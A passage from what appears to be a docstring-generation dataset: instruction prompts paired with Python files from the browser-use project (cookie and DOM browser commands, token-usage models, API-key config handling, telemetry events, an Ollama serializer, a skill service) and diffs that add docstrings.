                ]
            return {'cookies': cookie_list}
        elif cookies_command == 'set':
            from cdp_use.cdp.network import Cookie

            cookie_dict: dict[str, Any] = {
                'name': params['name'],
                'value': params['value'],
                'path': params.get('path', '/'),
                'secure': params.get('secure', False),
                'httpOnly': params.get('http_only', False),
            }
            if params.get('domain'):
                cookie_dict['domain'] = params['domain']
            if params.get('same_site'):
                cookie_dict['sameSite'] = params['same_site']
            if params.get('expires'):
                cookie_dict['expires'] = params['expires']
            # If no domain specified, get current URL's domain
            if not params.get('domain'):
                hostname = await _execute_js(session, 'window.location.hostname')
                if hostname:
                    cookie_dict['domain'] = hostname
            try:
                cookie_obj = Cookie(**cookie_dict)
                await bs._cdp_set_cookies([cookie_obj])
                return {'set': params['name'], 'success': True}
            except Exception as e:
                logger.error(f'Failed to set cookie: {e}')
                return {'set': params['name'], 'success': False, 'error': str(e)}
        elif cookies_command == 'clear':
            url = params.get('url')
            if url:
                # Clear cookies only for specific URL domain
                from urllib.parse import urlparse

                cookies = await bs._cdp_get_cookies()
                parsed = urlparse(url)
                domain = parsed.netloc
                cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
                if cdp_session:
                    for cookie in cookies:
                        cookie_domain = str(cookie.get('domain', '')).lstrip('.')
                        if domain.endswith(cookie_domain) or cookie_domain.endswith(domain):
                            await cdp_session.cdp_client.send.Network.deleteCookies(
                                params={
                                    'name': cookie.get('name', ''),
                                    'domain': cookie.get('domain'),
                                    'path': cookie.get('path', '/'),
                                },
                                session_id=cdp_session.session_id,
                            )
            else:
                # Clear all cookies
                await bs._cdp_clear_cookies()
            return {'cleared': True, 'url': url}
        elif cookies_command == 'export':
            import json

            # Get cookies via direct CDP
            cookies = await bs._cdp_get_cookies()
            # Convert to list of dicts
            cookie_list: list[dict[str, Any]] = []
            for c in cookies:
                cookie_dict: dict[str, Any] = {
                    'name': c.get('name', ''),
                    'value': c.get('value', ''),
                    'domain': c.get('domain', ''),
                    'path': c.get('path', '/'),
                    'secure': c.get('secure', False),
                    'httpOnly': c.get('httpOnly', False),
                }
                if 'sameSite' in c:
                    cookie_dict['sameSite'] = c.get('sameSite')
                if 'expires' in c:
                    cookie_dict['expires'] = c.get('expires')
                cookie_list.append(cookie_dict)
            # Filter by URL if provided
            url = params.get('url')
            if url:
                from urllib.parse import urlparse

                parsed = urlparse(url)
                domain = parsed.netloc
                cookie_list = [
                    c
                    for c in cookie_list
                    if domain.endswith(str(c.get('domain', '')).lstrip('.'))
                    or str(c.get('domain', '')).lstrip('.').endswith(domain)
                ]
            file_path = Path(params['file'])
            file_path.write_text(json.dumps(cookie_list, indent=2, ensure_ascii=False), encoding='utf-8')
            return {'exported': len(cookie_list), 'file': str(file_path)}
        elif cookies_command == 'import':
            import json

            file_path = Path(params['file'])
            if not file_path.exists():
                return {'error': f'File not found: {file_path}'}
            cookies = json.loads(file_path.read_text())
            # Get CDP session for bulk cookie setting
            cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
            if not cdp_session:
                return {'error': 'No active browser session'}
            # Build cookie list for bulk set
            cookie_list = []
            for c in cookies:
                cookie_params = {
                    'name': c['name'],
                    'value': c['value'],
                    'domain': c.get('domain'),
                    'path': c.get('path', '/'),
                    'secure': c.get('secure', False),
                    'httpOnly': c.get('httpOnly', False),
                }
                if c.get('sameSite'):
                    cookie_params['sameSite'] = c['sameSite']
                if c.get('expires'):
                    cookie_params['expires'] = c['expires']
                cookie_list.append(cookie_params)
            # Set all cookies in one call
            try:
                await cdp_session.cdp_client.send.Network.setCookies(
                    params={'cookies': cookie_list},  # type: ignore[arg-type]
                    session_id=cdp_session.session_id,
                )
                return {'imported': len(cookie_list), 'file': str(file_path)}
            except Exception as e:
                return {'error': f'Failed to import cookies: {e}'}
        return {'error': 'Invalid cookies command. Use: get, set, clear, export, import'}

    elif action == 'wait':
        import json as json_module

        wait_command = params.get('wait_command')
        if wait_command == 'selector':
            # Timeout arrives in milliseconds; poll every 100ms until it elapses.
            timeout_seconds = params.get('timeout', 30000) / 1000.0
            state = params.get('state', 'visible')
            selector = params['selector']
            poll_interval = 0.1
            elapsed = 0.0
            while elapsed < timeout_seconds:
                # Build JS check based on state
                if state == 'attached':
                    js = f'document.querySelector({json_module.dumps(selector)}) !== null'
                elif state == 'detached':
                    js = f'document.querySelector({json_module.dumps(selector)}) === null'
                elif state == 'visible':
                    js = f"""
                    (function() {{
                        const el = document.querySelector({json_module.dumps(selector)});
                        if (!el) return false;
                        const style = window.getComputedStyle(el);
                        const rect = el.getBoundingClientRect();
                        return style.display !== 'none' &&
                            style.visibility !== 'hidden' &&
                            style.opacity !== '0' &&
                            rect.width > 0 &&
                            rect.height > 0;
                    }})()
                    """
                elif state == 'hidden':
                    js = f"""
                    (function() {{
                        const el = document.querySelector({json_module.dumps(selector)});
                        if (!el) return true;
                        const style = window.getComputedStyle(el);
                        const rect = el.getBoundingClientRect();
                        return style.display === 'none' ||
                            style.visibility === 'hidden' ||
                            style.opacity === '0' ||
                            rect.width === 0 ||
                            rect.height === 0;
                    }})()
                    """
                else:
                    # Unknown state value falls back to a simple attached check.
                    js = f'document.querySelector({json_module.dumps(selector)}) !== null'
                result = await _execute_js(session, js)
                if result:
                    return {'selector': selector, 'found': True}
                await asyncio.sleep(poll_interval)
                elapsed += poll_interval
            return {'selector': selector, 'found': False}
        elif wait_command == 'text':
            import json as json_module

            timeout_seconds = params.get('timeout', 30000) / 1000.0
            text = params['text']
            poll_interval = 0.1
            elapsed = 0.0
            while elapsed < timeout_seconds:
                js = f"""
                (function() {{
                    const text = {json_module.dumps(text)};
                    return document.body.innerText.includes(text);
                }})()
                """
                result = await _execute_js(session, js)
                if result:
                    return {'text': text, 'found': True}
                await asyncio.sleep(poll_interval)
                elapsed += poll_interval
            return {'text': text, 'found': False}
        return {'error': 'Invalid wait command. Use: selector, text'}

    elif action == 'get':
        import json as json_module

        get_command = params.get('get_command')
        if get_command == 'title':
            title = await _execute_js(session, 'document.title')
            return {'title': title or ''}
        elif get_command == 'html':
            selector = params.get('selector')
            if selector:
                js = f'(function(){{ const el = document.querySelector({json_module.dumps(selector)}); return el ? el.outerHTML : null; }})()'
            else:
                js = 'document.documentElement.outerHTML'
            html = await _execute_js(session, js)
            return {'html': html or ''}
        elif get_command == 'text':
            index = params['index']
            node = await bs.get_element_by_index(index)
            if node is None:
                return {'error': f'Element index {index} not found - page may have changed'}
            # Use the node's text from our model
            text = node.get_all_children_text(max_depth=10) if node else ''
            return {'index': index, 'text': text}
        elif get_command == 'value':
            index = params['index']
            node = await bs.get_element_by_index(index)
            if node is None:
                return {'error': f'Element index {index} not found - page may have changed'}
            try:
                cdp_session = await bs.cdp_client_for_node(node)
                resolve_result = await cdp_session.cdp_client.send.DOM.resolveNode(
                    params={'backendNodeId': node.backend_node_id},
                    session_id=cdp_session.session_id,
                )
                object_id = resolve_result['object'].get('objectId')  # type: ignore[union-attr]
                if object_id:
                    # Read the live .value property from the resolved JS object.
                    value_result = await cdp_session.cdp_client.send.Runtime.callFunctionOn(
                        params={
                            'objectId': object_id,
                            'functionDeclaration': 'function() { return this.value; }',
                            'returnByValue': True,
                        },
                        session_id=cdp_session.session_id,
                    )
                    value = value_result.get('result', {}).get('value')
                    return {'index': index, 'value': value or ''}
                else:
                    return {'index': index, 'value': ''}
            except Exception as e:
                logger.error(f'Failed to get element value: {e}')
                return {'index': index, 'value': ''}
        elif get_command == 'attributes':
            index = params['index']
            node = await bs.get_element_by_index(index)
            if node is None:
                return {'error': f'Element index {index} not found - page may have changed'}
            # Use the attributes from the node model
            attrs = node.attributes or {}
            return {'index': index, 'attributes': dict(attrs)}
        elif get_command == 'bbox':
            index = params['index']
            node = await bs.get_element_by_index(index)
            if node is None:
                return {'error': f'Element index {index} not found - page may have changed'}
            try:
                cdp_session = await bs.cdp_client_for_node(node)
                box_result = await cdp_session.cdp_client.send.DOM.getBoxModel(
                    params={'backendNodeId': node.backend_node_id},
                    session_id=cdp_session.session_id,
                )
                model = box_result['model']  # type: ignore[index]
                content = model.get('content', [])  # type: ignore[union-attr]
                if len(content) >= 8:
                    # content is [x1, y1, x2, y2, x3, y3, x4, y4] - corners of the quad
                    x = min(content[0], content[2], content[4], content[6])
                    y = min(content[1], content[3], content[5], content[7])
                    width = max(content[0], content[2], content[4], content[6]) - x
                    height = max(content[1], content[3], content[5], content[7]) - y
                    return {'index': index, 'bbox': {'x': x, 'y': y, 'width': width, 'height': height}}
                else:
                    return {'index': index, 'bbox': {}}
            except Exception as e:
                logger.error(f'Failed to get element bbox: {e}')
                return {'index': index, 'bbox': {}}
        return {'error': 'Invalid get command. Use: title, html, text, value, attributes, bbox'}
raise ValueError(f'Unknown browser action: {action}') | --- +++ @@ -1,3 +1,4 @@+"""Browser control commands."""
import asyncio
import base64
@@ -34,6 +35,7 @@
async def _execute_js(session: SessionInfo, js: str) -> Any:
+ """Execute JavaScript in the browser via CDP."""
bs = session.browser_session
# Get or create a CDP session for the focused target
cdp_session = await bs.get_or_create_cdp_session(target_id=None, focus=False)
@@ -48,6 +50,7 @@
async def _get_element_center(session: SessionInfo, node: Any) -> tuple[float, float] | None:
+ """Get the center coordinates of an element."""
bs = session.browser_session
try:
cdp_session = await bs.cdp_client_for_node(node)
@@ -76,6 +79,7 @@
async def handle(action: str, session: SessionInfo, params: dict[str, Any]) -> Any:
+ """Handle browser control command."""
bs = session.browser_session
if action == 'open':
@@ -719,4 +723,4 @@
return {'error': 'Invalid get command. Use: title, html, text, value, attributes, bbox'}
- raise ValueError(f'Unknown browser action: {action}')+ raise ValueError(f'Unknown browser action: {action}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/browser.py |
Create documentation strings for testing functions | from datetime import datetime
from typing import Any, TypeVar
from pydantic import BaseModel, Field
from browser_use.llm.views import ChatInvokeUsage
T = TypeVar('T', bound=BaseModel)
class TokenUsageEntry(BaseModel):
    """One recorded LLM invocation's token usage, tagged with model and time."""

    model: str
    timestamp: datetime
    usage: ChatInvokeUsage
class TokenCostCalculated(BaseModel):
    """Token counts split by cache status, together with their computed costs.

    The cache-related fields are None when the provider reported no cache
    activity; cost properties treat None as zero.
    """

    new_prompt_tokens: int
    new_prompt_cost: float
    prompt_read_cached_tokens: int | None
    prompt_read_cached_cost: float | None
    prompt_cached_creation_tokens: int | None
    prompt_cache_creation_cost: float | None
    """Anthropic only: The cost of creating the cache."""
    completion_tokens: int
    completion_cost: float

    @property
    def prompt_cost(self) -> float:
        """Total prompt-side cost: new tokens + cache reads + cache creation."""
        return self.new_prompt_cost + (self.prompt_read_cached_cost or 0) + (self.prompt_cache_creation_cost or 0)

    @property
    def total_cost(self) -> float:
        """Full cost of the invocation (all prompt components + completion)."""
        return (
            self.new_prompt_cost
            + (self.prompt_read_cached_cost or 0)
            + (self.prompt_cache_creation_cost or 0)
            + self.completion_cost
        )
class ModelPricing(BaseModel):
    """Per-token pricing and token limits for a single model.

    All fields except *model* are optional: None means the pricing source
    did not publish that figure.
    """

    model: str
    input_cost_per_token: float | None
    output_cost_per_token: float | None
    cache_read_input_token_cost: float | None
    cache_creation_input_token_cost: float | None
    max_tokens: int | None
    max_input_tokens: int | None
    max_output_tokens: int | None
class CachedPricingData(BaseModel):
    """Raw pricing data cached locally, with the time it was stored."""

    timestamp: datetime
    data: dict[str, Any]
class ModelUsageStats(BaseModel):
    """Aggregated usage and cost statistics for one model."""

    model: str
    prompt_tokens: int = 0
    completion_tokens: int = 0
    total_tokens: int = 0
    cost: float = 0.0
    invocations: int = 0
    average_tokens_per_invocation: float = 0.0
class ModelUsageTokens(BaseModel):
    """Aggregated raw token counts for one model (no cost information)."""

    model: str
    prompt_tokens: int
    prompt_cached_tokens: int
    completion_tokens: int
    total_tokens: int
class UsageSummary(BaseModel):
    """Overall token usage and cost totals across all recorded invocations."""

    total_prompt_tokens: int
    total_prompt_cost: float
    total_prompt_cached_tokens: int
    total_prompt_cached_cost: float
    total_completion_tokens: int
    total_completion_cost: float
    total_tokens: int
    total_cost: float
    # Number of TokenUsageEntry records aggregated into these totals.
    entry_count: int
by_model: dict[str, ModelUsageStats] = Field(default_factory=dict) | --- +++ @@ -9,6 +9,7 @@
class TokenUsageEntry(BaseModel):
+ """Single token usage entry"""
model: str
timestamp: datetime
@@ -16,6 +17,7 @@
class TokenCostCalculated(BaseModel):
+ """Token cost"""
new_prompt_tokens: int
new_prompt_cost: float
@@ -45,6 +47,7 @@
class ModelPricing(BaseModel):
+ """Pricing information for a model"""
model: str
input_cost_per_token: float | None
@@ -59,12 +62,14 @@
class CachedPricingData(BaseModel):
+ """Cached pricing data with timestamp"""
timestamp: datetime
data: dict[str, Any]
class ModelUsageStats(BaseModel):
+ """Usage statistics for a single model"""
model: str
prompt_tokens: int = 0
@@ -76,6 +81,7 @@
class ModelUsageTokens(BaseModel):
+ """Usage tokens for a single model"""
model: str
prompt_tokens: int
@@ -85,6 +91,7 @@
class UsageSummary(BaseModel):
+ """Summary of token usage and costs"""
total_prompt_tokens: int
total_prompt_cost: float
@@ -98,4 +105,4 @@ total_cost: float
entry_count: int
- by_model: dict[str, ModelUsageStats] = Field(default_factory=dict)+ by_model: dict[str, ModelUsageStats] = Field(default_factory=dict)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tokens/views.py |
Generate consistent docstrings |
import json
import os
import sys
from pathlib import Path
class APIKeyRequired(Exception):
    """Raised when a feature needs a Browser-Use API key and none is available."""

    pass
def get_config_path() -> Path:
    """Return the platform-appropriate path of the browser-use config file.

    Windows uses %APPDATA%; everything else uses $XDG_CONFIG_HOME, falling
    back to the home directory (plus `.config` on non-Windows) when the
    environment variable is unset.
    """
    on_windows = sys.platform == 'win32'
    env_var = 'APPDATA' if on_windows else 'XDG_CONFIG_HOME'
    fallback = Path.home() if on_windows else Path.home() / '.config'
    base_dir = Path(os.environ.get(env_var, fallback))
    return base_dir / 'browser-use' / 'config.json'
def require_api_key(feature: str = 'this feature') -> str:
    """Resolve the Browser-Use API key, or raise with setup instructions.

    Resolution order:
        1. BROWSER_USE_API_KEY environment variable
        2. 'api_key' entry in the config file (see get_config_path())
        3. Interactive prompt — only when both stdin and stdout are TTYs
        4. APIKeyRequired with a help message naming *feature*

    Raises:
        APIKeyRequired: When no key can be obtained non-interactively and
            no TTY is attached.
    """
    # 1. Check environment
    key = os.environ.get('BROWSER_USE_API_KEY')
    if key:
        return key
    # 2. Check config file
    config_path = get_config_path()
    if config_path.exists():
        try:
            config = json.loads(config_path.read_text())
            if key := config.get('api_key'):
                return key
        except Exception:
            # Corrupt/unreadable config is treated the same as no config.
            pass
    # 3. Interactive prompt (if TTY)
    if sys.stdin.isatty() and sys.stdout.isatty():
        return prompt_for_api_key(feature)
    # 4. Error with helpful message
    raise APIKeyRequired(
        f"""
╭─────────────────────────────────────────────────────────────╮
│  🔑 Browser-Use API Key Required                            │
│                                                             │
│  {feature} requires an API key.                             │
│                                                             │
│  Get yours at: https://browser-use.com/new-api-key          │
│                                                             │
│  Then set it via:                                           │
│    export BROWSER_USE_API_KEY=your_key_here                 │
│                                                             │
│  Or add to {config_path}:                                   │
│    {{"api_key": "your_key_here"}}                           │
╰─────────────────────────────────────────────────────────────╯
"""
    )
def prompt_for_api_key(feature: str) -> str:
    """Interactively ask the user for an API key on stdin.

    Offers to persist the key via save_api_key(). Ctrl-C/EOF at the key
    prompt raises APIKeyRequired; at the save prompt it is ignored and the
    key is still returned.

    Raises:
        APIKeyRequired: When the user provides no key or aborts input.
    """
    print(
        f"""
╭─────────────────────────────────────────────────────────────╮
│  🔑 Browser-Use API Key Required                            │
│                                                             │
│  {feature} requires an API key.                             │
│  Get yours at: https://browser-use.com/new-api-key          │
╰─────────────────────────────────────────────────────────────╯
"""
    )
    try:
        key = input('Enter API key: ').strip()
    except (EOFError, KeyboardInterrupt):
        raise APIKeyRequired('No API key provided')
    if not key:
        raise APIKeyRequired('No API key provided')
    try:
        save = input('Save to config? [y/N]: ').strip().lower()
        if save == 'y':
            save_api_key(key)
    except (EOFError, KeyboardInterrupt):
        # Declining to save is fine — the key is still usable this run.
        pass
    return key
def save_api_key(key: str) -> None:
    """Persist *key* into the browser-use config file.

    Existing config entries are preserved (an unreadable config file is
    replaced). The file is restricted to owner read/write (0600).
    """
    config_path = get_config_path()
    config_path.parent.mkdir(parents=True, exist_ok=True)
    existing: dict = {}
    if config_path.exists():
        try:
            existing = json.loads(config_path.read_text())
        except Exception:
            # Corrupt config: start fresh rather than fail the save.
            existing = {}
    existing['api_key'] = key
    config_path.write_text(json.dumps(existing, indent=2))
    # Restrict permissions to owner only (0600)
    config_path.chmod(0o600)
    print(f'Saved to {config_path}')
def get_api_key() -> str | None:
    """Return the API key if one can be resolved, else None.

    NOTE: delegates to require_api_key(), so when attached to a TTY this
    may still trigger an interactive prompt before returning.
    """
    try:
        return require_api_key('API key check')
    except APIKeyRequired:
        return None
def check_api_key() -> dict[str, bool | str | None]:
    """Report API key availability without prompting or raising.

    Returns a dict with:
        'available': whether a key was found,
        'source': 'env', 'config', or None,
        'key_prefix': first 8 characters of the key (whole key if shorter).
    """
    # Check environment
    key = os.environ.get('BROWSER_USE_API_KEY')
    if key:
        return {
            'available': True,
            'source': 'env',
            'key_prefix': key[:8] if len(key) >= 8 else key,
        }
    # Check config file
    config_path = get_config_path()
    if config_path.exists():
        try:
            config = json.loads(config_path.read_text())
            if key := config.get('api_key'):
                return {
                    'available': True,
                    'source': 'config',
                    'key_prefix': key[:8] if len(key) >= 8 else key,
                }
        except Exception:
            # Unreadable config counts as no key.
            pass
    # Not available
    return {
        'available': False,
        'source': None,
        'key_prefix': None,
} | --- +++ @@ -1,3 +1,4 @@+"""API key management for browser-use CLI."""
import json
import os
@@ -6,11 +7,13 @@
class APIKeyRequired(Exception):
+ """Raised when API key is required but not provided."""
pass
def get_config_path() -> Path:
+ """Get browser-use config file path."""
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
@@ -19,6 +22,14 @@
def require_api_key(feature: str = 'this feature') -> str:
+ """Get API key or raise helpful error.
+
+ Checks in order:
+ 1. BROWSER_USE_API_KEY environment variable
+ 2. Config file (~/.config/browser-use/config.json)
+ 3. Interactive prompt (if TTY)
+ 4. Raises APIKeyRequired with helpful message
+ """
# 1. Check environment
key = os.environ.get('BROWSER_USE_API_KEY')
if key:
@@ -59,6 +70,7 @@
def prompt_for_api_key(feature: str) -> str:
+ """Interactive prompt for API key."""
print(
f"""
╭─────────────────────────────────────────────────────────────╮
@@ -89,6 +101,7 @@
def save_api_key(key: str) -> None:
+ """Save API key to config file."""
config_path = get_config_path()
config_path.parent.mkdir(parents=True, exist_ok=True)
@@ -107,6 +120,7 @@
def get_api_key() -> str | None:
+ """Get API key if available, without raising error."""
try:
return require_api_key('API key check')
except APIKeyRequired:
@@ -114,6 +128,14 @@
def check_api_key() -> dict[str, bool | str | None]:
+ """Check API key availability without interactive prompts.
+
+ Returns:
+ Dict with keys:
+ - 'available': bool - whether API key is configured
+ - 'source': str | None - where it came from ('env', 'config', or None)
+ - 'key_prefix': str | None - first 8 chars of key (for display)
+ """
# Check environment
key = os.environ.get('BROWSER_USE_API_KEY')
if key:
@@ -142,4 +164,4 @@ 'available': False,
'source': None,
'key_prefix': None,
- }+ }
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/api_key.py |
Generate missing documentation strings | from abc import ABC, abstractmethod
from collections.abc import Sequence
from dataclasses import asdict, dataclass
from typing import Any, Literal
from browser_use.config import is_running_in_docker
@dataclass
class BaseTelemetryEvent(ABC):
    """Base class for telemetry events.

    Subclasses are dataclasses whose fields become the event properties;
    the 'name' field is excluded from properties and identifies the event.
    """

    @property
    @abstractmethod
    def name(self) -> str:
        """Event name reported to the telemetry backend."""
        pass

    @property
    def properties(self) -> dict[str, Any]:
        """All dataclass fields except 'name', plus an is_docker flag."""
        props = {k: v for k, v in asdict(self).items() if k != 'name'}
        # Add Docker context if running in Docker
        props['is_docker'] = is_running_in_docker()
        return props
@dataclass
class AgentTelemetryEvent(BaseTelemetryEvent):
# start details
task: str
model: str
model_provider: str
max_steps: int
max_actions_per_step: int
use_vision: bool | Literal['auto']
version: str
source: str
cdp_url: str | None
agent_type: str | None # 'code' for CodeAgent, None for regular Agent
# step details
action_errors: Sequence[str | None]
action_history: Sequence[list[dict] | None]
urls_visited: Sequence[str | None]
# end details
steps: int
total_input_tokens: int
total_output_tokens: int
prompt_cached_tokens: int
total_tokens: int
total_duration_seconds: float
success: bool | None
final_result_response: str | None
error_message: str | None
# judge details
judge_verdict: bool | None = None
judge_reasoning: str | None = None
judge_failure_reason: str | None = None
judge_reached_captcha: bool | None = None
judge_impossible_task: bool | None = None
name: str = 'agent_event'
@dataclass
class MCPClientTelemetryEvent(BaseTelemetryEvent):
server_name: str
command: str
tools_discovered: int
version: str
action: str # 'connect', 'disconnect', 'tool_call'
tool_name: str | None = None
duration_seconds: float | None = None
error_message: str | None = None
name: str = 'mcp_client_event'
@dataclass
class MCPServerTelemetryEvent(BaseTelemetryEvent):
version: str
action: str # 'start', 'stop', 'tool_call'
tool_name: str | None = None
duration_seconds: float | None = None
error_message: str | None = None
parent_process_cmdline: str | None = None
name: str = 'mcp_server_event'
@dataclass
class CLITelemetryEvent(BaseTelemetryEvent):
version: str
action: str # 'start', 'message_sent', 'task_completed', 'error'
mode: str # 'interactive', 'oneshot', 'mcp_server'
model: str | None = None
model_provider: str | None = None
duration_seconds: float | None = None
error_message: str | None = None
name: str = 'cli_event' | --- +++ @@ -60,6 +60,7 @@
@dataclass
class MCPClientTelemetryEvent(BaseTelemetryEvent):
+ """Telemetry event for MCP client usage"""
server_name: str
command: str
@@ -75,6 +76,7 @@
@dataclass
class MCPServerTelemetryEvent(BaseTelemetryEvent):
+ """Telemetry event for MCP server usage"""
version: str
action: str # 'start', 'stop', 'tool_call'
@@ -88,6 +90,7 @@
@dataclass
class CLITelemetryEvent(BaseTelemetryEvent):
+ """Telemetry event for CLI usage"""
version: str
action: str # 'start', 'message_sent', 'task_completed', 'error'
@@ -97,4 +100,4 @@ duration_seconds: float | None = None
error_message: str | None = None
- name: str = 'cli_event'+ name: str = 'cli_event'
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/telemetry/views.py |
Write docstrings describing functionality | import base64
import json
from typing import Any, overload
from ollama._types import Image, Message
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
SystemMessage,
ToolCall,
UserMessage,
)
class OllamaMessageSerializer:
@staticmethod
def _extract_text_content(content: Any) -> str:
if content is None:
return ''
if isinstance(content, str):
return content
text_parts: list[str] = []
for part in content:
if hasattr(part, 'type'):
if part.type == 'text':
text_parts.append(part.text)
elif part.type == 'refusal':
text_parts.append(f'[Refusal] {part.refusal}')
# Skip image parts as they're handled separately
return '\n'.join(text_parts)
@staticmethod
def _extract_images(content: Any) -> list[Image]:
if content is None or isinstance(content, str):
return []
images: list[Image] = []
for part in content:
if hasattr(part, 'type') and part.type == 'image_url':
url = part.image_url.url
if url.startswith('data:'):
# Handle base64 encoded images
# Format: data:image/jpeg;base64,<data>
_, data = url.split(',', 1)
# Decode base64 to bytes
image_bytes = base64.b64decode(data)
images.append(Image(value=image_bytes))
else:
# Handle URL images (Ollama will download them)
images.append(Image(value=url))
return images
@staticmethod
def _serialize_tool_calls(tool_calls: list[ToolCall]) -> list[Message.ToolCall]:
ollama_tool_calls: list[Message.ToolCall] = []
for tool_call in tool_calls:
# Parse arguments from JSON string to dict for Ollama
try:
arguments_dict = json.loads(tool_call.function.arguments)
except json.JSONDecodeError:
# If parsing fails, wrap in a dict
arguments_dict = {'arguments': tool_call.function.arguments}
ollama_tool_call = Message.ToolCall(
function=Message.ToolCall.Function(name=tool_call.function.name, arguments=arguments_dict)
)
ollama_tool_calls.append(ollama_tool_call)
return ollama_tool_calls
# region - Serialize overloads
@overload
@staticmethod
def serialize(message: UserMessage) -> Message: ...
@overload
@staticmethod
def serialize(message: SystemMessage) -> Message: ...
@overload
@staticmethod
def serialize(message: AssistantMessage) -> Message: ...
@staticmethod
def serialize(message: BaseMessage) -> Message:
if isinstance(message, UserMessage):
text_content = OllamaMessageSerializer._extract_text_content(message.content)
images = OllamaMessageSerializer._extract_images(message.content)
ollama_message = Message(
role='user',
content=text_content if text_content else None,
)
if images:
ollama_message.images = images
return ollama_message
elif isinstance(message, SystemMessage):
text_content = OllamaMessageSerializer._extract_text_content(message.content)
return Message(
role='system',
content=text_content if text_content else None,
)
elif isinstance(message, AssistantMessage):
# Handle content
text_content = None
if message.content is not None:
text_content = OllamaMessageSerializer._extract_text_content(message.content)
ollama_message = Message(
role='assistant',
content=text_content if text_content else None,
)
# Handle tool calls
if message.tool_calls:
ollama_message.tool_calls = OllamaMessageSerializer._serialize_tool_calls(message.tool_calls)
return ollama_message
else:
raise ValueError(f'Unknown message type: {type(message)}')
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[Message]:
return [OllamaMessageSerializer.serialize(m) for m in messages] | --- +++ @@ -14,9 +14,11 @@
class OllamaMessageSerializer:
+ """Serializer for converting between custom message types and Ollama message types."""
@staticmethod
def _extract_text_content(content: Any) -> str:
+ """Extract text content from message content, ignoring images."""
if content is None:
return ''
if isinstance(content, str):
@@ -35,6 +37,7 @@
@staticmethod
def _extract_images(content: Any) -> list[Image]:
+ """Extract images from message content."""
if content is None or isinstance(content, str):
return []
@@ -57,6 +60,7 @@
@staticmethod
def _serialize_tool_calls(tool_calls: list[ToolCall]) -> list[Message.ToolCall]:
+ """Convert browser-use ToolCalls to Ollama ToolCalls."""
ollama_tool_calls: list[Message.ToolCall] = []
for tool_call in tool_calls:
@@ -89,6 +93,7 @@
@staticmethod
def serialize(message: BaseMessage) -> Message:
+ """Serialize a custom message to an Ollama Message."""
if isinstance(message, UserMessage):
text_content = OllamaMessageSerializer._extract_text_content(message.content)
@@ -134,4 +139,5 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[Message]:
- return [OllamaMessageSerializer.serialize(m) for m in messages]+ """Serialize a list of browser_use messages to Ollama Messages."""
+ return [OllamaMessageSerializer.serialize(m) for m in messages]
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/ollama/serializer.py |
Create docstrings for reusable components |
import logging
import os
from typing import Any, Literal
from browser_use_sdk import AsyncBrowserUse
from browser_use_sdk.types.execute_skill_response import ExecuteSkillResponse
from browser_use_sdk.types.skill_list_response import SkillListResponse
from cdp_use.cdp.network import Cookie
from pydantic import BaseModel, ValidationError
from browser_use.skills.views import (
MissingCookieException,
Skill,
)
logger = logging.getLogger(__name__)
class SkillService:
def __init__(self, skill_ids: list[str | Literal['*']], api_key: str | None = None):
self.skill_ids = skill_ids
self.api_key = api_key or os.getenv('BROWSER_USE_API_KEY') or ''
if not self.api_key:
raise ValueError('BROWSER_USE_API_KEY environment variable is not set')
self._skills: dict[str, Skill] = {}
self._client: AsyncBrowserUse | None = None
self._initialized = False
async def async_init(self) -> None:
if self._initialized:
logger.debug('SkillService already initialized')
return
# Create the SDK client
self._client = AsyncBrowserUse(api_key=self.api_key)
try:
# Fetch skills from API
logger.info('Fetching skills from Browser Use API...')
use_wildcard = '*' in self.skill_ids
page_size = 100
requested_ids: set[str] = set() if use_wildcard else {s for s in self.skill_ids if s != '*'}
if use_wildcard:
# Wildcard: fetch only first page (max 100 skills) to avoid LLM tool overload
skills_response: SkillListResponse = await self._client.skills.list_skills(
page_size=page_size,
page_number=1,
is_enabled=True,
)
all_items = list(skills_response.items)
if len(all_items) >= page_size:
logger.warning(
f'Wildcard "*" limited to first {page_size} skills. '
f'Specify explicit skill IDs if you need specific skills beyond this limit.'
)
logger.debug(f'Fetched {len(all_items)} skills (wildcard mode, single page)')
else:
# Explicit IDs: paginate until all requested IDs found
all_items = []
page = 1
max_pages = 5 # Safety limit
while page <= max_pages:
skills_response = await self._client.skills.list_skills(
page_size=page_size,
page_number=page,
is_enabled=True,
)
all_items.extend(skills_response.items)
# Check if we've found all requested skills
found_ids = {s.id for s in all_items if s.id in requested_ids}
if found_ids == requested_ids:
break
# Stop if we got fewer items than page_size (last page)
if len(skills_response.items) < page_size:
break
page += 1
if page > max_pages:
logger.warning(f'Reached pagination limit ({max_pages} pages) before finding all requested skills')
logger.debug(f'Fetched {len(all_items)} skills across {page} page(s)')
# Filter to only finished skills (is_enabled already filtered by API)
all_available_skills = [skill for skill in all_items if skill.status == 'finished']
logger.info(f'Found {len(all_available_skills)} available skills from API')
# Determine which skills to load
if use_wildcard:
logger.info('Wildcard "*" detected, loading first 100 skills')
skills_to_load = all_available_skills
else:
# Load only the requested skill IDs
skills_to_load = [skill for skill in all_available_skills if skill.id in requested_ids]
# Warn about any requested skills that weren't found
found_ids = {skill.id for skill in skills_to_load}
missing_ids = requested_ids - found_ids
if missing_ids:
logger.warning(f'Requested skills not found or not available: {missing_ids}')
# Convert SDK SkillResponse objects to our Skill models and cache them
for skill_response in skills_to_load:
try:
skill = Skill.from_skill_response(skill_response)
self._skills[skill.id] = skill
logger.debug(f'Cached skill: {skill.title} ({skill.id})')
except Exception as e:
logger.error(f'Failed to convert skill {skill_response.id}: {type(e).__name__}: {e}')
logger.info(f'Successfully loaded {len(self._skills)} skills')
self._initialized = True
except Exception as e:
logger.error(f'Error during skill initialization: {type(e).__name__}: {e}')
self._initialized = True # Mark as initialized even on failure to avoid retry loops
raise
async def get_skill(self, skill_id: str) -> Skill | None:
if not self._initialized:
await self.async_init()
return self._skills.get(skill_id)
async def get_all_skills(self) -> list[Skill]:
if not self._initialized:
await self.async_init()
return list(self._skills.values())
async def execute_skill(
